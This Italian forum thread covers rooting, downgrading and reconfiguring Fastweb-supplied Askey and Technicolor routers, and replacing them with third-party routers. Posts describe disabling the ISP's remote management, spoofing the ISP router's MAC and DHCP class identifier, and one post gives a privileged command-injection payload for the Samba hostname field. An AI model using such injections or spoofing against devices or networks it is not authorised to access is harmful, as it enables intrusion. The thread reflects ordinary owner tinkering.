Diciamo che ADB e Technicolor sono dei vendor per i quali poter fare diversi esperimenti, ma l'Askey RTV1907VW-D228, come direbbe Giacomo, fanno veramente ca**re....
Esteticamente sono identici ai DGA4131 ma con notevoli differenze HW.
-
E io che pensavo fosse esattamente il contrario e che erano i 4131 ad essere stati tolti di mezzo (ne ho avuto uno che mi è durato poco, sembra essere saltato il chip WiFi e va in bootloop)
Ma a questo punto i firmware delle due distribuzioni sai se sono interscambiabili? C'è un modo per riconoscerli esternamente? Ci sono i download? Perché per quanto faccia schifo, avere openwrt sopra potrebbe fargli acquisire un'altro senso
-
@FrancYescO no i firmware non sono interscambiabili, l'hw è totalmente differente nonostante l'estetica identica, così come la nomenclatura dei firmware (per poterli riconoscere).
Es: 0.00 267_fw_200 per l'Askey e 17.2 0245_fw_226 per il Technicolor.
Sono entrambe "Cpe Uniche" ovvero adoperabili sia come IAD (in VoIP) che in MOS (non VoIP, la vecchia tripolare per intenderci) e dacché io sappia non si trovano in rete release (Fastweb ha una politica piuttosto ristretta a riguardo)
Tutti i nuovi clienti, specialmente i GPON, hanno il DGA 4131 ormai, che a loro stessa detta (ed entrando io tramite PuTTY) hanno delle prestazioni maggiori, poiché montano un hardware leggermente superiore rispetto all' Askey.
Se desideri OpenWRT allora vai di DGA4131.
-
Non ci stiamo capendo.. che il technicolor abbia OpenWRT e hw diverso lo so, ho avuto anche possibilità di rootarlo e acquisisce tutte le potenzialità alla pari di un timhub, ma come scritto l'esemplare che ho, è passato a miglior vita.
Il dubbio che mi stavi facendo venire è che possano esistere Askey usciti dalla casa con software OpenWRT
-
@FrancYescO ho risposto alle tue domande inerenti ai fw interscambiabili, reperibili, ecc.
Sono circa il 50% gli Askey con OpenWRT di fabbrica, ma esistono, e ne ho avuto accesso personalmente.
-
Ok è che avevi tirato in ballo il DGA e mi stavo confondendo..
Quindi in ogni caso esiste il firmware 0.00 267_fw_200 per l'Askey che è basato su OpenWRT ma che non è installabile sugli Askey non nati con openwrt.
Sarebbe interessante capire se ci sono differenze anche hardware esterne (anche qualcosa sull'etichetta) per capire come distinguere i due modelli di Askey (OpenWRT e non)
-
@FrancYescO indagherò e ti farò sapere. Ora vado, buona giornata! :)
-
@FrancYescO allora, pare che le cpe rilasciate di fabbrica con la release 0.00.267 (l'ultima) contenessero proprio OpenWrt, ma vuoi sapere la beffa?
Fastweb ha trovato dei bug significativi nel suddetto firmware (tra cui parte VoIP, telegestione anche) e li ha tutti downgradati alla versione 0.00.81!!! :D
Dunque niente più OpenWrt di default su Askey.
-
Quindi non ci sono revisioni hardware diverse di askey, ma solo firmware piu' nuovi basati su openwrt.. magari li rivedremo a breve dopo che hanno sistemato i problemi...
-
Allora ci aggiorniamo fra una decina d'anni :rotfl:
-
Vabbhe dai ormai il core l'hanno cambiato, salvo ritornare sui loro passi e continuare a sviluppare la versione vecchia (o lasciare marcire i dispositivi con questa 0.81) ho buone speranze si rivedra' questo firmware
-
@FrancYescO penso di no. Effettivamente non stanno più distribuendo gli Askey o i Techicolor (giusto le ultime scorte in magazzino) e ora ai nuovi clienti stanno installando suddetta CPE:
UCPE 1.1 Technicolor FGA2130FWB
Hanno pensato direttamente a cambiare modem, vedremo come andrà con questo.
-
@Combine mi sai dire un esempio di firmware?
-
Sembra arrivato un nuovo giocattolo che ci fara' divertire :D
-
Ver. 18
-
@Ansuel al momento no.
Presto però ti potrò dare l'elenco dei fw dettagliati disponibili per questa nuova cpe ;) 8)
-
mh in realtà ho già trovato tutti i firmware ahahaha sto vedendo di trovare quelli precedenti ma mi sa che hanno solo prodotto con 18.3
-
@Ansuel grande, allora la prossima settimana potrò fare una ricerca approfondita e riferirti tutti i firmware disponibili per questa nuova release.
-
sarei più interessato ad avere un device ahahah
-
@Ansuel che codice della board ti risulta dall'header del firmware?
-
root@modemtim:/tmp# bli_parser 18.3.0237_FW_216_FGA2130.rbi
magic_value: BLI2
fim: 23
fia: MR
prodid: 0
varid: 0
version: 0.0.0.0
data_offset: 363
data_size: 26477242
timestamp: 0x23C0C8CE
boardname: GBNT-2
prodname: Technicolor FGA2130
varname: FGA2130
tagparserversion: 200
flashaddress: 0x3000000
-
Ok grazie. a naso direi che abbia l'ont gpon integrato… almeno che quella G in GBNT-2 non sia uno specchietto per le allodole. Se così fosse DGA->FGA potrebbe indicare il passaggio da DSL a FIBER.
PS: ho capito che ormai usi il tim hub come tuo device principale ma se mai ti andasse di farlo direttamente dal pc, FYI c'è lo scriptino python dell'australiano
-
potevo anche usare hxd ma vbb era per avere una roba veloce ed ordinata
-
Questi nuovi modem sono ottimizzati per le linee GPON e e relative infrastrutture.
-
Nessuna novità per questo modem
-
Non credo, è ancora troppo acerbo, considera che lo vedo in giro da neanche un mese.
-
Scusami io parlavo del asky
-
Spulciando tra i vari topic non vedo nulla, almeno per il momento.
Stesso non dicasi per l'altra UCPE DGA4131
-
Grazie molto gentile
-
ma il fga2130 e stato rootato?
-
non sappiano neanche se sta venendo distribuito... comunque è rootabile 100% stesso metodo del dga1431 (siccome anche se fixano abbiamo i firmware per fare downgrade)
-
@Ansuel, o gia provato con la guida di dga4131 e non va...forse i file non sono quelli giusti
p.s. ti avevo scrito un paio di volte in pm ma...
-
ma te non hai fga o.o
-
fga2130fwb questo scrive sulla eticheta ed e mio
-
fai un topic a parte... io proverei prima di tutto a fare downgrade
-
@Ansuel fai tu il topic aparte cosi abbiamo un punto di partenza, provato a fare il down...pero parte sempre con l`ultima versione...
p.s scusate il offtopic
-
Perchè, qualcuno lo ha già ricevuto?
-
@LuKePicci ce l`ho io comprato sul ....s...o se parli del fga
-
coprato dove? su ebay o su subito non ne trovo
-
@Ansuel sul subito....ma non devi cercarlo doppo la sigla perche non tutti sano di scrivere il modello....ma se qualcuno e interesatto o un amico che li puo procurari mi scrivete in pm e io vi do il nr. anche altri modelli.....
-
Ha lo stesso firmware di base dei DGA4131 con OpenWRT integrato. E' rootabile. Occorre downgradare offline se lo permette (dovrebbe).
-
@nice.guy12 dovresti forzare lo switch di bank se hai già fatto downgrade da tftp e non si è caricato con la nuova versione
se riesci a sbloccarlo sarei curioso di chiave di decriptazione e dump firmware siccome per ora è la base più recente che abbiamo
-
@Ansuel purtroppo le mie conoscenze sono molto base per fare lo sblocco.....o solo seguito le guide che voi avete fatto e ringrazio per tutto il lavoro e il tempo perso da voi per fare conoscere a noi le vie per sbloccare alcuni device.....
-
Che versione è quella che hai ora? E' datata prima o dopo la pubblicazione dello sblocco del 4131?
PS: se create il thread dedicate avvertite qui.
edit: eccolo https://www.ilpuntotecnico.com/forum/index.php/topic,80633.msg0/topicseen.html#new
-
Scusate, tornando all'argomento di questo thread, non ho capito se il RTV1907VW sia rootabile usando il metodo recentemente sviluppato per il DGA 4131 e, in caso affermativo, se si possa poi caricarci la GUI di Ansuel. Grazie.
-
no sono sistemi differenti
-
Ciao a tutti,
ho recentemente avuto un router Askey come da topic ed avrei l'intenzione di modificare alcune impostazioni di sistema non usualmente accessibili tramite la GUI del vendor fornitore.
Mi sono sfogliato tutto il thread ma non ho colto metodi alternativi all'accesso root tramite seriale, che pare ora non essere più disponibile.
Al termine del boot pare che la release di firmware in uso sul mio esemplare non lanci alcuna shell, né quindi richieda alcun login.
Versione software: 1.0.1b
Versione firmware: 0.00.81_FW_200_Askey 2018-10-02 18:08:18
Ho tentato anche a montare un USB EXT2 con un link simbolico alla root ma tramite samba vengo fermato subito a tentarne il list per diritti d'accesso insufficienti (probabilmente il demone samba non gira come come root e la / sarà leggibile solo a root).
Il bootloader sembra nella stessa versione che ho trovato nei post più vecchi:
Base: 4.16_05
CFE version 1.0.38-118.3 for BCM963138 (32bit,SP,LE)
Build Date: Tue Nov 1 23:00:13 CST 2016 (charles@charles-All-Series)
Copyright (C) 2000-2015 Broadcom Corporation.
Bootloader version: CFEROM : 2.5.2Nr1820 CFERAM : 2.5.2Nr1820
Boot Strap Register: 0x7dfffc2f
Chip ID: BCM63136B0, ARM Cortex A9 Dual Core: 1000MHz
Total Memory: 536870912 bytes (512MB)
NAND ECC BCH-4, page size 0x800 bytes, spare size used 64 bytes
NAND flash device: , id 0xc2dc block 128KB size 524288KB
pmc_init:PMC using DQM mode
Board IP address : 192.168.1.1:ffffff00
Host IP address : 192.168.1.100
Gateway IP address :
Run from flash/host/tftp (f/h/c) : f
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
Boot delay (0-9 seconds) : 1
Boot image (0=latest, 1=previous) : 0
Default host ramdisk file name :
Default ramdisk store address :
Board Id (0-31) : RTV1907VWC3
Number of MAC Addresses (1-32) : 16
Base MAC Address : e8:d1:1b:91:72:72
PSI Size (1-128) KBytes : 48
Enable Backup PSI [0|1] : 0
System Log Size (0-256) KBytes : 0
Auxillary File System Size Percent: 0
MC memory allocation (MB) : 4
TM memory allocation (MB) : 44
DHD 0 memory allocation (MB) : 14
DHD 1 memory allocation (MB) : 0
DHD 2 memory allocation (MB) : 0
WLan Feature : 0x00
Voice Board Configuration (0-1) : LE9642_ZSI_BB
Partition 1 Size (MB) : 8M
Partition 2 Size (MB) : 1M
Partition 3 Size (MB) : 4M
Partition 4 Size (MB) (Data) : 4M
Il processo di boot sembra terminare con alcune righe come la seguente:
[system_probe.c:1440] ChannelHistory Wait for boot procession complete..
ed infine:
[system_probe.c:1436] channel_history_boot_count==12 ; ForceAddChannelHistory2G/5G...
da qui non va più avanti.
Ho provato a collegare la porta SFP alla mia rete ed a configurare un DHCP per dargli un indirizzo e poi accedervi tramite SSH usando io un IP nelle subnet del vendor così da passare le regole del firewall: arrivo ad accedere, uso utente e password standard ma ottengo un CLI e non una shell completa. Il comando sh non è riconosciuto, né ho trovato altri stratagemmi per accedere al file system oné tantomento lanciare una shell più completa.
Confermo che esiste ancora la pagina web del bootloader CFE per caricare un firmware, ma non ho trovato alcun firmware da provare ad uploadare.
Avete qualche idea da suggerire per andare avanti?
Grazie del suggerimento! Ciao!
-
@yoko stesso tuo identico problema, seriale muta , c'è una possibilità di riattivare l'accesso? ci sono novità generali su questo apparato?
Nome fornitoreAskey
Nome prodottoRTV1907VW
Versione software1.0.1b
Versione firmware0.00.81_FW_200_Askey 2018-10-02 18:08:18
-
Ciao a tutti,
a me servirebbe estrapolare dal router (in qualche modo che ancora non mi è ben chiaro nemmeno leggendo ciò che è stato scritto), se possibile, i dati per configurare il VoIP in un router FRITZ!Box.
È possibile?
C'è già una guida?
Grazie in anticipo a tutti per le risposte.
-
Io sarei interessato ad installare OpenWRT su RTV1907VW, ho una rev. 3.
Francamente l'hardware è a disposizione per tutte le prove del caso (trovato gratis).
Qualcuno sa come richiedere il supporto del chip ad OpenWRT?
Grazie e buona domenica
-
@davideakc hai accesso alla seriale? hai un vecchio firmware? hai una linea sotto vula?
@Ansuel mediante la pagina update è possibile anche caricare un vecchio firmware di quelli nella repository? non fa un controllo di versione?
-
Per l'accesso alla seriale mi pare di aver visto la guida qui, un vecchio firmware purtroppo non ce l'ho, ma potrei cercarlo su internet e la linea sotto VULA sì...
-
sei sotto vula e hai voip fastweb? sei uno dei pochi fortunati che ad oggi riesce a navigare col fritzbox 7590 sotto fibra fastweb .... cmq la seriale ti serve per forza al momento, però ad oggi il firmware 0.081 come descritto sopra blocca la seriale ... devi attendere
per quanto riguarda i firmware la repository li ha tutti quindi se fisicamente hai accesso al router prova a dargli in pasto un firmware versione 67 e vedi cosa succede (sempre se ho capito bene leggendo i post precedenti) o aspetta la risposta di ansuel (io al momento non mi trovo fisicamente con il router e non posso provare
-
No, è questo il problema... Sono in VULA e VoIP e non navigo assolutamente con il FRITZ!Box nonostante i parametri corretti. Mi aggancia la portante ma non mi assegna un indirizzo IP.
Penso però che oltre a configurare la linea dati, bisogna anche configurare il VoIP (di cui i parametri, anche se pubblicati in questa pagina (https://www.fastweb.it/adsl-fibra-ottica/dettagli/altri-modem/) [punto 3] non sono soddisfacenti).
Quindi non lo so, mi trovo fermo a chiamare il servizio clienti ogni giorno per trovare un operatore disposto a rilasciarmi ciò che mi serve, dato che al momento tutti dicono che con la mia configurazione non si può fare nulla se non utilizzare il loro router.
-
No il tuo problema riguarda il mac address del fritz non riconosciuto. Devi impostare le option del dhcp del fritz in modo che il client id contenga un mac address registrato o uno non registrato ma compatibile e poi fare la registrazione
edit_ oppure clonare direttamente il mac dell'interfaccia
-
Esattamente, dove imposto il client id all'interno del FRITZ!Box?
Nel campo del DHCP (nelle impostazioni di connessione) io ho scritto "fritz.box" (come suggerito da Fastweb).
Comunque, chiamando l'assistenza tecnica mi sono fatto sostituire il MAC Address del router loro, con quello del mio FRITZ!Box e non è cambiato nulla a livello di connessione...
-
Dovresti provare a catturare il traffico generato dal fritz, le richieste dhcp in particolare, e verificare che il campo sia compilato correttamente. Il fritz non lo conosco, ma l'ultima volta che ho configurato un mio device in vula tim al posto del fastgate, compreso voip, ho fatto come ti ho detto. Inoltre controlla anche che il mac del fritz della porta wan dsl sia effettivamente quello che gli hai comunicato e non uno di quelli numericamente adiacenti a quello stampato sull'etichetta. Infatti ad esempio quello che usa il router fastweb non è quello che trovi sull'etichetta.
-
Non risolveresti nulla perché il dhcp in vula Fastweb (telefono più internet)viene gestito anche dalla connessione VoIP a detta di tecnici Fastweb ..... infatti molti in vula ma solo internet riescono a navigare con vlan id 100 anche se castrati in download
@Combine puoi confermare questa cosa ?? Ci sai dare un consiglio su come poter fa funzionare i fritz in vula Fastweb avendo VoIP ??
-
Mi sembra proprio una stupidaggine, il voip è una cosa che si configura solo dopo la connessione. Una volta messa vlan 100 e impostata la giusta dhcp option si prende l'ip, poi si pensa al voip.
-
Io ho letto in giro che VoIP e linea dati navigano su due valori valori VPI/VCI diversi, quindi se non si configurano tutti e due, difficilmente il tutto funziona.
Per questo avrei bisogno di estrapolare dal router, in qualche modo, i dati VoIP in quanto Fastweb non li rilascia, anzi... Se li chiami rispondono pure scocciati affermando che non mi serve cambiare il router e che il loro funziona benissimo (nonostante loro siano obbligati a fornire i dati per la configurazione, come dice questa pagina (https://www.fastweb.it/adsl-fibra-ottica/dettagli/altri-modem/)).
-
VPI/VCI servono in adsl, altrimenti si parla di VLAN ID. Su fastweb, non mi risulta di configurazioni dual wan per voce e dati, come è invece su Vodafone e tiscali ad esempio. Le configurazioni del voip il router le estrae in automatico una volta fatta la connessione dati, quindi preoccupati di far funzionare quella. Tra i dati del voip non troverai nulla che non sia semplicemente nome utente e password sip per il telefono e altre cosucce sempre relative a quello. Niente che faccia funzionare il dhcp in ogni caso. Te li puoi far dare da chiunque sappia come procurarseli a partire dai tuoi estremi, o alla peggio procurati uno degli svariati altri loro modem sbloccabili e leggile da lì.
-
@LuKePicci se hai certezza di questo va bene , avendo un tecnico fastweb nel gruppo domandare era lecito :-) @Combine aspettiamo una sua risposta.....
fatto sta che ad oggi sotto vula con voip nessuno fastweb riesce a navigare .... vuoi che mancano parametri vuoi che il blocco mac controlla anche altro .......
cmq tornando a noi Luke è possibile passare un firmware diverso al askey che sia superiore o inferiore con la procedura esposta precedentemente non avendo accesso alla seriale che ormai è muta ? ripeto al momento non sono fisicamente vicino a quel router e non posso fare prove...
-
Non lo so io non ho questo modello.
PS, ripeto che io su vula navigo tranquillamente e mi funziona pure il voip
-
Che device stai usando con fastweb?
E come hai recuperato le config per il voip?
Grazie
-
I FRITZ!Box con l'ISP Fastweb talvolta non vanno molto d'accordo. Né con i VULA né soprattutto con i profili 35b.
Fastweb ha una megaintranet tutta sua per ragioni di "sicurezza" che se non vengono rispettate non funziona correttamente.
Se quest'ultimo è configurato come IAD dunque come VoIP potrebbe non funzionare dato che il modem non viene riconosciuto al 100%, ad esempio non riesce a trovare il server SIP proxy outbound.
-
@Combine quindi anche recuperando tutti i valori credi che non sia fattibile usare il fritz una volta clonato anche il mac??
-
Non so risponderti con certezza poiché non ho mai provato personalmente, ma conoscendo il rapporto Fastweb / Fritz!Box non credo sia fattibile, almeno non facilmente.
Il modem non viene comunque individuato su alcuni dei nostri programmi che possano con certezza rivelare o meno quale sia il problema.
Utile sarebbe effettuare un test con un programma che si chiama Ear O' Matic per scoprire quale errore restituisca, esempio errato instradamento proxy, problema bsh e via dicendo.
Per il resto non so aiutarti più di così spiacente..
-
@ramponis ho un dga4131 sbloccato che uso con ftth tiscali, un argo 95 che uso con vecchia ftth fastweb, avevo un 789vac v2 con fw fastweb su vula fttc fastweb e su quest'ultima ho connesso il un altro 789vac v2 ex fastweb con fw alternativo uno.uk. A proposito di quest'ultimo, Impostando solo vlan 100 non riceveva risposta dhcp. Aggiungendo alle settings della interfaccia wan il mac della wan dell'altro technicolor (che non corrisponde a quello sull'etichetta) si è connesso col solito ip 10.x specifico della mia linea senza problemi ad internet e quant'altro, voip compreso con parametri impostati a mano naturalmente. Infine ho fatto la prova a rimettere il mac originale leggermente variato nell'ultima parte, si è connesso prendendo un ip temporaneo, non inerente la mia linea. Con questo ip potevo raggiungere solo le risorse fastweb tipo la pagina di registrazione, che non ho completato dato che non mi serviva e non volevo rischiare di deautorizzare l'altro. Il mac originale credo non funzionasse per niente perchè già noto a fastweb, ma questa è solo una mia ipotesi, il resto invece è frutto di prove.
Sul fritz non so nulla, non ho letto di nessuno che si sia preso la briga di studiare il comportamento di fritzos riguardo la clonazione del mac e le richieste dhcp, o se permette di impostare selettivamente i mac di ogni interfaccia. Se con metodo, vi mettete a capire come funziona il fritzbox forse riuscite anche a cavarvela.
-
Infine ho fatto la prova a rimettere il mac originale leggermente variato nell'ultima parte, si è connesso prendendo un ip temporaneo, non inerente la mia linea. Con questo ip potevo raggiungere solo le risorse fastweb tipo la pagina di registrazione
In questo caso il modem non veniva correttamente autenticato dal radius sul DPPU e non consentiva l'accesso fuori la rete fastweb.
-
E cosa ne pensi sul perchè il mac originale non andasse bene? Voglio dire, se mettendone uno a caso arrivo a poter fare la registrazione, come mai con quello predefinito no?
Mac predefinito del router fornito con la linea: XX:XX:XX:YY:YY:YY -> funzionante
Mac predefinito del router fastweb messo al suo posto: ZZ:ZZ:ZZ:KK:KK:KK -> non funzinoante
Mac predefinito del router fastweb messo al suo posto leggermente variato: ZZ:ZZ:ZZ:42:42:42 -> solo rete interna, forse funzionante dopo registrazione
-
Non so risponderti con certezza poiché non ho mai provato personalmente
Se ti può essere d'aiuto, il FRITZ!Box, dopo qualche minuto, mi restituisce questo errore: https://i.imgur.com/5S38dr8.png
-
@davideakc metti tutti i parametri che usi per la connessione dati (che imposti sul fritz)
-
Certo, allora:
Nome provider di internet: Fastweb (qui posso mettere qualsiasi cosa in realtà)
Poi seleziono: "Connessione: collegamento a una connessione DSL"
Sono necessari dati di accesso: no
Utilizzare VLAN per l'accesso a internet: sì
ID VLAN: 100
VPI: 8
VCI: 36
Ottieni automaticamente parametri DHCP: sì
Nome host DHCP: fritz.box
Incapsulamento: PPPoE (non posso mettere altro)
E così non mi assegna un indirizzo IP.
-
Hai una vdsl o adsl? Nel primo caso vpi e vci non servono, puoi ignorarli. Incapsulamento PPPoE è sbagliato. Se ignora quel parametro come col VPI/VCI allora è ininfluente.
-
Ho una VDSL FTTN, so che i valori VPI/VCI non servono ma sono due campi obbligatori.
Non ho idea se il PPPoE sia ininfluente o meno, in quanto è solo scritto e non è selezionabile...
-
@davideakc adeguati alla Netiquette del forum in particolare punto 2), vedi link in firma grazie.
-
@edison
nei post precedenti dici che è possibile flashare il router mediante seriale avendo accesso "/usr/sbin/fw_upgrade"
se volessimo mettere 0.00.267_FW_200_Askey metteremo "fw_upgrade 0.00.267_FW_200_Askey" giusto?
ma al riavvio farebbe il controllo online e lo riporterebbe alla versione 81... giusto??
allora a voi più esperti in questo nuovo settore o per lo meno che avete più dimestichezza ... potete aiutarci a creare o modificare lo script di avvio( o per lo meno indicarlo) e poi noi cercheremo di modificarlo in modo da poter bloccare la telegestione ( perchè credo che da quello riescano a far flashare il router)
anche se poi ad ogni riavvio sarebbe un casino perchè carica tutto di defaut ....
ma un anima pia che mi aiuti a modificare e poi caricare l'immagina modificata? così poi creeremo una guida per tutti gli altri comuni che cercano disperatamente di avere accesso...
1. ad ora con accesso alla seriale si riesce grazie anche a edison con il suo post a caricare una versione precedente che ha ancora la possibilità di usare il login da seriale (spero che non aggiornino un'altra volta se no addio a tutto) per questo chiedo un aiuto urgente prima che venga flashato anche l'ultima speranza con il firmware precedente...
2. abilitare il telnet e ssh mediante aggiunta delle tabelle vedi sito di julian (aggiungo che in questo punto con i nuovi firmware sono state create delle eccezioni in iptables che disabilitano il telnet e ssh da togliere mediante riga di comando altrimenti non si collega, già fatto testato e funzionante )
3. sto cercando di abilitare ftp ma per il momento senza successo (ma se riesco a risolvere il primo punto credo di riuscire a fare questo)
4. nelle versioni successive al 81 @Combine mi spieghi meglio cosa hanno aggiunto? o meglio oltre ai bug cosa hanno di positivo che possiamo sfruttare?
conviene andare con firmware precedente o ultimo(mantiene la login da seriale?)?
grazie per eventuali risposte scusate se ho scritto tutto questo ma dopo una giornata di lavoro mi sono tagliato 5 minuti per voi (spero di essere stato chiaro ho scritto e non riletto l'intero post)
-
ciao,
io, come ho già specificato, ho trovato il modo di modificare il filesystem rootfs (di tipo ubifs) (con nanddump si fa il dump della partizione mtd che lo contiene, si monta in una macchina linux usando nandsim / flash_erase / ubiformat / ubiattach, lo si modifica, lo si ridumpa e lo si riflasha con ubiformat)
in tal modo ho inserito uno script nella cartella /etc/rc3.d che viene eseguito al boot e che richiama uno script salvato nella directory /data (così da poterlo modificare senza dover riflashare ogni volta...)
in questo modo posso modificare ad ogni avvio la configurazione di iptables e killare il processo cwmp (accesso remoto al router da parte di fastweb)
inoltre ho recuperato una versione di busybox più recente con molti più comandi e impostato un check che ogni 5 min verifica che iptables non ricarichi la conf di default
pro: è molto distante dal poter flashare un firmware unbranded (non saprei nemmeno dove trovarlo anche se qualcosa sembra esserci nella cartella /web) ma qualcosa mi permette di personalizzare...
contro: è comunque necessario collegarsi in seriale (via UART) almeno la prima volta ed il processo esposto sopra di modifica del rootfs è molto macchinoso
ciao
@wax77 provo la tua strada posso disturbare in privato per suggerimenti e aiuti ??
-
fastweb ha aggiornato la pagina relativa agli altri modem
Per soddisfare le migliori prestazioni e performance per interfacciarsi correttamente con la rete Fibra mista rame FTTN di Fastweb, è necessario che il modem disponga delle seguenti caratteristiche tecniche, quali:
Supporto standard VDSL2 (ITU-T G.993.2) fino al profilo 35b
Supporto Seamless Rate Adaptation (SRA)
Supporto retransmission G.INP (ITU-T G.998.4)
Supporto vectoring (ITU-T G.993.5)
Configurabilità dei parametri di rete con le seguenti impostazioni:
Incapsulamento PTM untagged / Incapsulamento PTM tagged (VLAN ID 100; CoS 0 per traffico dati e CoS 2 per traffico voce)
DHCP client abilitato sull'interfaccia WAN per acquisizione dinamica dell'indirizzo IP
Configurabilità dei parametri di LAN con le seguenti impostazioni:
DHCP server abilitato per assegnazione dinamica degli indirizzi agli apparati connessi in LAN
Funzionamento del modem in modalità routed (NAT abilitato)
Nel caso di Fibra FTTH, la porta WAN Ethernet del modem scelto dal cliente alternativo al FASTGate deve essere collegata alla terminazione ottica (ONT) fornita da Fastweb mediante un cavo di rete Ethernet Categoria 5e o superiore.
L'apparato scelto dal cliente per la connessione dati deve avere una interfaccia di rete WAN di tipo Gigabit Ethernet Full-Duplex Auto-Sensing.
3. Requisiti ed impostazioni relative al servizio VoIP
Supporto SIP (RFC 3261)
Supporto query DNS per risoluzione dell'indirizzo del proxy di accesso alla rete SIP Fastweb
Proxy SIP: voip.fastwebnet.it
Proxy SIP Port: 5060
SIP Transport Protocol: UDP
Supporto del metodo PRACK (RFC 3262)
Supporto metodo OPTIONS
REGISTER expires time: 3600 s
INVITE Expires: impostato ad un valore superiore a 430 s
Codec supportati: G.729 G.729A (inclusa versione A, NON supportate le versioni B e AB), G.711 A-law
VAD (Voice Activity Detection): disabilitato
Packetization time: 20ms
Supporto toni DTMF: in-band telephone-event (RFC 2833)
Fax protocol: solo T.38
Marcatura QoS traffico IP:
SIP e RTP: DSCP CS5
Dati: DSCP 0
naturalmente a me non funziona una cippa
-
Ho risolto il mio problema con il FRITZ!Box 7530 e una linea fibra+VoIP.
L'unica cosa che non funziona, al momento, è il VoIP, ma basta chiamare il servizio clienti e chiedere i dati.
Loro ti fisseranno un appuntamento telefonico con un tecnico che configurerà il VoIP.
Per risolvere il problema è bastato clonare il MAC Address del FASTGate sul FRITZ!Box tramite FBEditor ed aggiungere la seguente stringa:
class_identifier = "askey_HW_ES1_SW_=_.00.47";
subito sotto a:
etherencapcfg {
use_dhcp = yes;
use_dhcp_if_not_encap_ether = no;
ipaddr = 0.0.0.0;
netmask = 0.0.0.0;
gateway = 0.0.0.0;
dns1 = 0.0.0.0;
dns2 = 0.0.0.0;
Poi, dopo aver salvato il file, lo ricaricate tramite GUI del FRITZ!Box ed il gioco è fatto (almeno nel mio caso).
-
@taetae sul 4131 dovresti avere una impostazione simile nelle settings dell'interfaccia wan in dhcp, dopo aver clonato il mac come già spiegato, prova anche a rimuovere eventuali classi già impostate nelle settings di default (in modo che non risulti come un dga4131) e prova. Se ancora non ne vuole sapere prova a clonare la classe dell'askey come ha suggerito qui sopra.
-
https://slides.poul.org/2018/workshop-interni/fastgate-hacking/ trovato online
-
Qualcosa si è mosso, anche l'AVM ha pubblicato la guida sulla configurazione del VoIP su rete Fastweb: https://it.avm.de/assistenza/libera-scelta-del-router/fastweb/
-
ciao ragazzi ora provo a fare il downgrade lo faccio andare in failboot poi vi dico cosa succede; successivamente provero il root con la guida creata di @Ansuel e lo riaggiorno all'ultima... vediamo se l'exploit funziona.
-
si allora è inutile reperire le credenziali che io gia avevo estrapolato dal router perchè sono differenti da quelle che vengono fornite dai tecnici al momento della gestione voip ... (parlo di quelle del fastgate) ... per quanto riguarda la connessione dati invece basta clonare il macaddress e impostare i parametri ... appena ho 5 minuti cercherò di istaurare una connessione con il dga 4131 @LuKePicci clonando il macaddress (differente dal precedente fastgate )
-
Vi racconto la mia breve storia triste.
La mia configurazione FTTH (forse sono OT) Fastgate, Mikrotik e spa112 per il voip
Qualche settimana fa provo con un mediaconverter di mia proprietà della tp-link a escludere il fastgate configurando option 60 del mikrotik con la stringa 'askey_HW_ES1_SW_=_.00.47' e dopo vari tentativi riesco ad associarmi via DHCP all'IP di fastweb clonando il mac address del fastgate sulla WAN del mikrotik.
Riesco addirittura tramite lo spa112 a configurare le linee voip in uscita.
Il giorno dopo mi si presenta il tecnico Fastweb a casa che mi cambia l'ONT con uno proprietario ZTC. Da quel momento non funziona più nulla.
Chiamo fastweb e con l'aiuto di un tecnico riesco a riconfigurare la linea dati facendomi sbloccare anche il macaddress reale del mikrotik e facendomi ripristinare l'ONT del fastgate, ma la linea Voip è andata a farsi benedire.
Non riesco più a connettermi nemmeno così come facevo prima.
Ora mi chiedo, sarebbe possibile tramite uart accedere alla configurazione del fastgate per recuperare i parametri del VOIP e provare di nuovo a configurare il centralino voip o lo spa112???? Qualcuno è riuscito nell'intento?
Il tecnico fastweb, molto disponibile, mi ha detto che non può riasciarmi le credenziali interne del fastgate ma deve impostarle lui manualmente. Credenziali che però mi permettono di usare solo il mio dispositivo, che di fatto non si autentica, quindi perdo il lato voip anche ripristinando il fastgate. :clap: :clap: :clap:
-
dove posso trovare la guida per sbloccare questo router?
-
Ci sono parecchie vulnerabilità di command injection in questo modem (considerando il vecchio firmware .67 a mia disposizione).
Per esempio è vulnerabile al command injection tramite l'hostname Samba, con un semplice
; comando
I comandi vengono eseguiti nel contesto di `rc_task`, quindi privilegiati
(Verificato funzionante)
-
Si il vecchio firmware era un formaggio svizzero, c'è pure una repo github con del lavoro svolto a quell'epoca.
-
Buon pomeriggio,
fortunatamente, in un modo o nell altro, personalmente sono già in possesso delle credenziali per la configurazione del VoIP.
In questi giorni avrei comunque voluto provare, giusto per curiosità, a vedere se ci fosse comunque il modo di recuperare i parametri direttamente dal FastGate.
Ho trovato una guida online (e se è permesso potrei anche indicare il link), con le indicazioni per ottenere una Shell con privilegi di Root (partendo dalla connessione seriale).
Quello che mi chiedevo è, siccome non specificato su tale guida, se ciò è ancora possibile anche su Firmware .89 (il mio attuale).......
Se esiste tale possibilità, e se fosse consentito, potrei postare direttamente il link che ho trovato oppure anche solo gli step da seguire per capire se sia un approccio valido o meno.
-
La command injection tramite samba quasi sicuramente è possibile anche sugli ultimi firmware, poi con la seriale si va sul sicuro..
-
ciao a tutti come faccio a sbloccare il modem ?
ho provato a leggere ma non ci capisco una cippa
riuscite aiutarmi?
-
Come postato anche prima, Qui viene spiegato come farlo con seriale.
https://slides.poul.org/2018/workshop-interni/fastgate-hacking
-
@FrancYescO ottimo era proprio quello che avevo trovato anche io! Grazie!
Nel pomeriggio provo :happy:
-
@ghedo75 io sono ancora in fase "di sperimentazione" con il FastGate, quindi al momento non saprei aiutarti molto.....ma il tuo obbiettivo quale sarebbe?
Nel senso, vorresti sbloccarlo solo per ottenere una Shell con privilegi di root o avevi in mente altro? Tieni conto che a quanto ho capito non ci puoi fare molto di più con questo dispositivo, ma i più esperti sapranno sicuramente esser più precisi di me.
@FrancYescO Finalmente son potuto passare a qualche prova pratica! Ho collegato il Router tramite seriale al PC ed una volta acceso ho atteso che terminasse il boot.
Due cose hanno attratto la mia attenzione principalmente, la prima è questa stringa all inizio del boot:
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 1e la seconda, verso la fine
Password for 'lanadmin' changedIl boot termina semplicemente così:
Run ec...
Run http deamon...
[system_probe.c:194] Update ADB wanstatus: Name=eth0 status=down
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
[system_probe.c:1441] ChannelHistory Wait for boot procession complete..
